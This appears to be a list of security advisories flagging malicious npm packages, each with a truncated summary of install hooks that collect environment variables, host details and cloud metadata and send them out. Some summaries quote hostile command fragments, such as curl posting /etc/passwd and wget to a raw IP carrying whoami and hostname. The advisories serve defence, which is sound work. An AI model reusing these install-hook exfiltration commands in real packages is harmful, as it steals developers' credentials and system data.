Malicious code in pocteszep (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d The package's npm preinstall lifecycle script runs wget --quiet...

Malicious code in @entos-ems/xerxes-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5632d30e60b3bb5fc5d731458a7c2972bd356c3ec1a9e8064df135359ee4ec7b On npm install, package.json's preinstall: node index.js hook fires automatically and runs a reconnaissance beacon. index.js collects host identifier...

MAL-2026-5537 Malicious code in @entos-ems/xerxes-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5632d30e60b3bb5fc5d731458a7c2972bd356c3ec1a9e8064df135359ee4ec7b On npm install, package.json's preinstall: node index.js hook fires automatically and runs a reconnaissance beacon. index.js collects host identifier...

Malicious code in zer0onedate (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 106494bfe4420962c30d8b3989a1397d197f277079c71b8d15695c9128d72399 On npm install, postinstall.js executes a chain of curl commands that read cloud instance metadata service IMDS endpoints — AWS...

Malicious code in zer0onedatetool (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 73fd05fda74bbf13c6275d4da0fa80fece821cad03fb2237ae74ed24309eab52 The postinstall lifecycle script in this package issues curl POST requests to a subdomain of oastify.com — the out-of-band callback domain operated b...

MAL-2026-5515 Malicious code in yelp-react-component-chaos (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 711cd262cc670c0e66cf2878b6fa22db21a2e420313a58aa029cbc619f2b27cc On npm install, preinstall.js collects hostname, username, cwd, network interfaces, and the names of environment variables matching...

Malicious code in menu-filter-widget-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bed4a7ece362ef59f2b621b3f64d06e899740c8ca8d73e437145d48b960187ce package.json declares a postinstall lifecycle hook that runs callback.js on every npm install. callback.js reads os.hostname and sends it to a...

MAL-2026-5486 Malicious code in menu-filter-widget-web (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bed4a7ece362ef59f2b621b3f64d06e899740c8ca8d73e437145d48b960187ce package.json declares a postinstall lifecycle hook that runs callback.js on every npm install. callback.js reads os.hostname and sends it to a...

MAL-2026-5409 Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

Malicious code in @easy-entry/outside-registration-fop-navigator (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...

MAL-2026-5408 Malicious code in @easy-entry/landing-routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556 On npm install, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First,...

Malicious code in @0xlr/prisma-client-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b993c29d90c2ecfffaa9ed55b99c38e5351052e619b79ad2a385d6c72376f0f4 On npm install, postinstall.js enumerates all of process.env, collects hostname, username, homedir, cwd, argv, platform/arch/release, memory and CPU...

Malicious code in @0xlr/stripe-frontend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3eda7bf8681a6253ffc4bc965888e45c5374e4ba8d4fe2e17efcd0f227d7ce5e On npm install, postinstall.js enumerates every entry in process.env sorted, bundles it with hostname, username, homedir, cwd, argv, and platform/arc...

MAL-2026-5389 Malicious code in @0xlr/stripe-frontend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3eda7bf8681a6253ffc4bc965888e45c5374e4ba8d4fe2e17efcd0f227d7ce5e On npm install, postinstall.js enumerates every entry in process.env sorted, bundles it with hostname, username, homedir, cwd, argv, and platform/arc...

MAL-2026-5390 Malicious code in @0xlr/supabase-db (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0feb7f8ea3069b0e830043fea195c088ea28709cc18a32676f389c61a15fc84c On npm install, the package's postinstall.js script enumerates all of process.env and collects host identifiers os.hostname, username, homedir, cwd,...

Malicious code in claude-channel-imessage (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9751c370c062cb40bccb874f46679ad3ca8ba9d3b49d0d8ba1f924d9582e53a3 On npm install, postinstall.js executes whoami and id, reads os.hostname, os.platform, process.cwd, and the CI, GITHUBREPOSITORY, and NODEENV...

Malicious code in cloudpivot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $whoami, $pwd, $hostname,...

MAL-2026-4529 Malicious code in cloudpivot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4bd95ac92732da86e3ec63771e124da83ea8d98e1dd2f6636ab3d8dde76ab34c On npm install, the package.json preinstall hook runs wget against http://194.120.24.50:7374 with query parameters carrying $whoami, $pwd, $hostname,...

Malicious code in mmt-static (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...

Malicious code in openmct-couch-plugin (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ce8eff366d17efa64bf8605941d009d01cf7a24aaf011af30faec449fc4a2e28 On npm install, the package's preinstall script runs node index.js and then curls the output of hostname && whoami to...